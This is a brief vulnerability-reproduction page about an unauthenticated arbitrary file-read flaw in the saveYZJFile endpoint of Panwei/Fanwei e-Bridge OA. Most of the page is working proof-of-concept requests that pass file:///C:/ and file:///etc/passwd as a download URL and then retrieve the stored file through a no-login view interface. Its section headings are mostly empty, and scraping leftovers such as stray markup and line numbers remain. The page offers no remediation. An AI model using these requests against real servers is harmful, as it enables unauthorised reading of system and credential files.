Panwei Oa E Bridge Saveyzjfile Arbitrary File Reading Vulnerability
Panwei Oa E Bridge Saveyzjfile Arbitrary File Reading Vulnerability
Panwei OA E-Bridge saveYZJFile arbitrary file reading vulnerability
Vulnerability Description
Affect Version
Fanwei Cloud Bridge e-Bridge 2018-2019 Multiple Versions
Network surveying and mapping
Vulnerability reappears
1
2
3
# Windows验证POC
/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C:/&fileExt=txt
Successfully returned id value, indicating that this vulnerability is contained
</a-alert>
###
1
2
3
# Linux验证POC
/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt
Successfully returned id value, indicating that this vulnerability is contained
Call the view file interface to access /file/fileNoLogin/id value
This post is licensed under CC BY 4.0 by the author.